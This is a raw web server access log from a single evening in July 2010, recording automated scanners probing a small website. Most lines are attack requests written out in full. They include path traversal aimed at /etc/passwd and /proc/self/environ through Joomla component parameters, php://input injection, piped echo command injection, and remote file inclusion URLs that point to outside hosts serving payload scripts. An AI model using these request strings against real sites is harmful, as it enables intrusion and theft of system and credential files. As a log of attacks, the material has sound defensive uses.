112.104.57.22 - - [26/Jul/2010:18:53:20 -0700] "GET /logs/access_100517.log///skin/board/moviefl/download.php?board_skin_path=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.vspeaking.com"
112.104.57.22 - - [26/Jul/2010:18:53:21 -0700] "GET /logs/access_100517.log///skin/board/moviefl/download.php?board_skin_path=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.vspeaking.com"
91.121.67.226 - - [26/Jul/2010:18:53:47 -0700] "GET /logs/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 2225 "-" "libwww-perl/5.803" "www.vspeaking.com"
91.121.67.226 - - [26/Jul/2010:18:53:47 -0700] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.803" "www.vspeaking.com"
78.41.233.128 - - [26/Jul/2010:18:55:01 -0700] "GET /logs/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 2225 "-" "libwww-perl/5.805" "www.vspeaking.com"
78.41.233.128 - - [26/Jul/2010:18:55:01 -0700] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.vspeaking.com"
94.23.8.200 - - [26/Jul/2010:18:59:38 -0700] "GET /logs/access.log///index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "vspeaking.com"
94.23.8.200 - - [26/Jul/2010:18:59:38 -0700] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "vspeaking.com"
94.23.8.200 - - [26/Jul/2010:18:59:38 -0700] "GET /logs///index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "vspeaking.com"
95.141.32.178 - - [26/Jul/2010:19:15:02 -0700] "GET /index.php?option=com_jacomment&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
119.192.145.144 - - [26/Jul/2010:19:15:51 -0700] "GET /index.php?option=com_jacomment&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
202.47.80.12 - - [26/Jul/2010:19:17:11 -0700] "GET /logs/access.log//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
202.47.80.12 - - [26/Jul/2010:19:17:15 -0700] "GET /logs/access.log//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
202.47.80.12 - - [26/Jul/2010:19:17:17 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
202.47.80.12 - - [26/Jul/2010:19:17:21 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
202.47.80.12 - - [26/Jul/2010:19:17:22 -0700] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
202.47.80.12 - - [26/Jul/2010:19:17:26 -0700] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
95.141.32.178 - - [26/Jul/2010:19:19:10 -0700] "GET /logs/access.log//index.php?option=com_jacomment&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
95.141.32.178 - - [26/Jul/2010:19:19:11 -0700] "GET /index.php?option=com_jacomment&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
95.141.32.178 - - [26/Jul/2010:19:19:11 -0700] "GET /logs//index.php?option=com_jacomment&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
112.104.57.22 - - [26/Jul/2010:19:21:57 -0700] "GET /errors.php?error=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.vspeaking.com"
112.104.57.22 - - [26/Jul/2010:19:21:57 -0700] "GET /logs/errors.php?error=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.vspeaking.com"
112.104.57.22 - - [26/Jul/2010:19:21:57 -0700] "GET /logs/access_100719.log/errors.php?error=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.vspeaking.com"
112.104.57.22 - - [26/Jul/2010:19:21:57 -0700] "GET /errors.php?error=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.vspeaking.com"
112.104.57.22 - - [26/Jul/2010:19:21:57 -0700] "GET /logs/errors.php?error=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.vspeaking.com"
112.104.57.22 - - [26/Jul/2010:19:21:57 -0700] "GET /logs/access_100719.log/errors.php?error=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.vspeaking.com"
119.192.145.144 - - [26/Jul/2010:19:26:15 -0700] "GET /logs/access.log//index.php?option=com_jacomment&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
119.192.145.144 - - [26/Jul/2010:19:26:16 -0700] "GET /index.php?option=com_jacomment&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
119.192.145.144 - - [26/Jul/2010:19:26:16 -0700] "GET /logs//index.php?option=com_jacomment&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
95.141.32.178 - - [26/Jul/2010:19:28:01 -0700] "GET /index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
95.141.32.178 - - [26/Jul/2010:19:29:29 -0700] "GET /logs/access.log//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
95.141.32.178 - - [26/Jul/2010:19:29:29 -0700] "GET /index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
95.141.32.178 - - [26/Jul/2010:19:29:29 -0700] "GET /logs//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
85.17.199.46 - - [26/Jul/2010:19:44:58 -0700] "GET /logs/access_100607.log/index.php?menu=deti&page=../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.vspeaking.com"
85.17.199.46 - - [26/Jul/2010:19:44:58 -0700] "GET /logs/access_100607.log/index.php?menu=deti&page=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.vspeaking.com"
85.17.199.46 - - [26/Jul/2010:19:44:58 -0700] "GET /logs/access_100607.log/index.php?menu=deti&page=....//....//....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.vspeaking.com"
85.17.199.46 - - [26/Jul/2010:19:44:59 -0700] "POST /logs/access_100607.log/index.php?menu=deti&page=php://input HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.vspeaking.com"
85.17.199.46 - - [26/Jul/2010:19:44:59 -0700] "GET /index.php?menu=deti&page=../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.vspeaking.com"
85.17.199.46 - - [26/Jul/2010:19:44:59 -0700] "GET /index.php?menu=deti&page=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.vspeaking.com"
85.17.199.46 - - [26/Jul/2010:19:44:59 -0700] "GET /index.php?menu=deti&page=....//....//....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.vspeaking.com"
85.17.199.46 - - [26/Jul/2010:19:44:59 -0700] "POST /index.php?menu=deti&page=php://input HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.vspeaking.com"
85.17.199.46 - - [26/Jul/2010:19:45:00 -0700] "GET /logs/index.php?menu=deti&page=../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.vspeaking.com"
85.17.199.46 - - [26/Jul/2010:19:45:00 -0700] "GET /logs/index.php?menu=deti&page=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.vspeaking.com"
85.17.199.46 - - [26/Jul/2010:19:45:00 -0700] "GET /logs/index.php?menu=deti&page=....//....//....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.vspeaking.com"
85.17.199.46 - - [26/Jul/2010:19:45:00 -0700] "POST /logs/index.php?menu=deti&page=php://input HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.vspeaking.com"
125.141.91.138 - - [26/Jul/2010:19:45:23 -0700] "GET /errors.php?error=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
125.141.91.138 - - [26/Jul/2010:19:45:24 -0700] "GET /logs/errors.php?error=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
125.141.91.138 - - [26/Jul/2010:19:45:24 -0700] "GET /logs/access.log%20%20/errors.php?error=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
125.141.91.138 - - [26/Jul/2010:19:45:25 -0700] "GET /logs/errors.php?error=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
125.141.91.138 - - [26/Jul/2010:19:45:26 -0700] "GET /logs/access.log%20%20/errors.php?error=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
125.141.91.138 - - [26/Jul/2010:19:45:26 -0700] "GET /errors.php?error=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
66.249.65.112 - - [26/Jul/2010:19:49:32 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.vspeaking.com"
95.141.32.178 - - [26/Jul/2010:19:50:09 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "vspeaking.com"
112.104.57.22 - - [26/Jul/2010:19:51:19 -0700] "GET /logs/access.log/errors.php?error=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.vspeaking.com"
112.104.57.22 - - [26/Jul/2010:19:51:20 -0700] "GET /logs/access.log/errors.php?error=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.vspeaking.com"
206.214.220.151 - - [26/Jul/2010:19:51:37 -0700] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://dedy.fileave.com/alita/id3.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
125.141.91.138 - - [26/Jul/2010:19:52:07 -0700] "GET /components/com_rwcards//errors.php?error=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "vspeaking.com"
125.141.91.138 - - [26/Jul/2010:19:52:07 -0700] "GET /logs//components/com_rwcards//errors.php?error=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "vspeaking.com"
125.141.91.138 - - [26/Jul/2010:19:52:07 -0700] "GET /logs/access.log%20%20//components/com_rwcards//errors.php?error=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "vspeaking.com"
125.141.91.138 - - [26/Jul/2010:19:52:09 -0700] "GET /components/com_rwcards//errors.php?error=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "vspeaking.com"
125.141.91.138 - - [26/Jul/2010:19:52:09 -0700] "GET /logs/access.log%20%20//components/com_rwcards//errors.php?error=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "vspeaking.com"
125.141.91.138 - - [26/Jul/2010:19:52:09 -0700] "GET /logs//components/com_rwcards//errors.php?error=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "vspeaking.com"
119.192.145.144 - - [26/Jul/2010:19:57:23 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "vspeaking.com"
125.141.91.138 - - [26/Jul/2010:19:57:28 -0700] "GET /logs//components/com_rwcards//errors.php?error=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
125.141.91.138 - - [26/Jul/2010:19:57:28 -0700] "GET /logs/access_100607.log%20%20//components/com_rwcards//errors.php?error=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
125.141.91.138 - - [26/Jul/2010:19:57:29 -0700] "GET /components/com_rwcards//errors.php?error=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
125.141.91.138 - - [26/Jul/2010:19:57:35 -0700] "GET /components/com_rwcards//errors.php?error=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
125.141.91.138 - - [26/Jul/2010:19:57:35 -0700] "GET /logs//components/com_rwcards//errors.php?error=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
125.141.91.138 - - [26/Jul/2010:19:57:35 -0700] "GET /logs/access_100607.log%20%20//components/com_rwcards//errors.php?error=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
85.17.199.46 - - [26/Jul/2010:20:04:42 -0700] "GET /index.php?menu=deti&page=../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.vspeaking.com"
85.17.199.46 - - [26/Jul/2010:20:04:42 -0700] "GET /index.php?menu=deti&page=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.vspeaking.com"
85.17.199.46 - - [26/Jul/2010:20:04:42 -0700] "GET /index.php?menu=deti&page=....//....//....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.vspeaking.com"
85.17.199.46 - - [26/Jul/2010:20:04:42 -0700] "POST /index.php?menu=deti&page=php://input HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.vspeaking.com"
95.141.32.178 - - [26/Jul/2010:20:21:05 -0700] "GET /logs/access.log//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "vspeaking.com"
95.141.32.178 - - [26/Jul/2010:20:21:05 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "vspeaking.com"
95.141.32.178 - - [26/Jul/2010:20:21:06 -0700] "GET /logs//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "vspeaking.com"
95.141.32.178 - - [26/Jul/2010:20:33:02 -0700] "GET /index.php?option=com_janews&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "vspeaking.com"
119.192.145.144 - - [26/Jul/2010:20:36:05 -0700] "GET /logs/access.log//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "vspeaking.com"
119.192.145.144 - - [26/Jul/2010:20:36:16 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "vspeaking.com"
119.192.145.144 - - [26/Jul/2010:20:36:17 -0700] "GET /logs//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "vspeaking.com"
95.141.32.178 - - [26/Jul/2010:20:40:59 -0700] "GET /logs/access.log//index.php?option=com_janews&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "vspeaking.com"
95.141.32.178 - - [26/Jul/2010:20:40:59 -0700] "GET /index.php?option=com_janews&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "vspeaking.com"
95.141.32.178 - - [26/Jul/2010:20:40:59 -0700] "GET /logs//index.php?option=com_janews&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "vspeaking.com"
207.46.199.40 - - [26/Jul/2010:20:43:36 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "vspeaking.com"
207.46.199.40 - - [26/Jul/2010:20:46:39 -0700] "GET / HTTP/1.1" 200 779 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "vspeaking.com"
119.192.145.144 - - [26/Jul/2010:20:46:46 -0700] "GET /index.php?option=com_janews&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "vspeaking.com"
95.141.32.178 - - [26/Jul/2010:21:03:56 -0700] "GET /index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
93.42.216.165 - - [26/Jul/2010:21:05:01 -0700] "GET /logs/access_081013.log/tiny_includes/config.php?dir_ws=http://oklsdioj.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.vspeaking.com"
93.42.216.165 - - [26/Jul/2010:21:05:02 -0700] "GET /tiny_includes/config.php?dir_ws=http://oklsdioj.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.vspeaking.com"
93.42.216.165 - - [26/Jul/2010:21:05:02 -0700] "GET /logs//tiny_includes/config.php?dir_ws=http://oklsdioj.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.vspeaking.com"
95.141.32.178 - - [26/Jul/2010:21:05:25 -0700] "GET /logs/access.log//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
95.141.32.178 - - [26/Jul/2010:21:05:26 -0700] "GET /index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
95.141.32.178 - - [26/Jul/2010:21:05:26 -0700] "GET /logs//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
119.192.145.144 - - [26/Jul/2010:21:06:47 -0700] "GET /logs/access.log//index.php?option=com_janews&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "vspeaking.com"
119.192.145.144 - - [26/Jul/2010:21:06:48 -0700] "GET /index.php?option=com_janews&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "vspeaking.com"
119.192.145.144 - - [26/Jul/2010:21:06:48 -0700] "GET /logs//index.php?option=com_janews&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "vspeaking.com"
119.192.145.144 - - [26/Jul/2010:21:09:43 -0700] "GET /index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
119.192.145.144 - - [26/Jul/2010:21:12:56 -0700] "GET /logs/access.log//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.0" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
119.192.145.144 - - [26/Jul/2010:21:12:56 -0700] "GET /index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
119.192.145.144 - - [26/Jul/2010:21:12:57 -0700] "GET /logs//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
188.127.248.175 - - [26/Jul/2010:21:16:37 -0700] "GET /index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.vspeaking.com"
194.149.14.77 - - [26/Jul/2010:21:16:41 -0700] "GET /index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
194.149.14.77 - - [26/Jul/2010:21:16:48 -0700] "GET /index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
194.149.14.77 - - [26/Jul/2010:21:17:08 -0700] "GET /index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "vspeaking.com"
64.15.156.75 - - [26/Jul/2010:21:17:11 -0700] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://faci.obihiro.ac.jp/download/ID-RFI.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.vspeaking.com"
188.127.248.175 - - [26/Jul/2010:21:17:15 -0700] "GET /index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "vspeaking.com"
188.127.248.175 - - [26/Jul/2010:21:17:22 -0700] "GET /index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.vspeaking.com"
94.23.215.207 - - [26/Jul/2010:21:18:49 -0700] "GET /logs/access.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.talkpic.com/bbs/icon/private_name/id1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
94.23.215.207 - - [26/Jul/2010:21:18:49 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.talkpic.com/bbs/icon/private_name/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
94.23.215.207 - - [26/Jul/2010:21:18:50 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.talkpic.com/bbs/icon/private_name/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
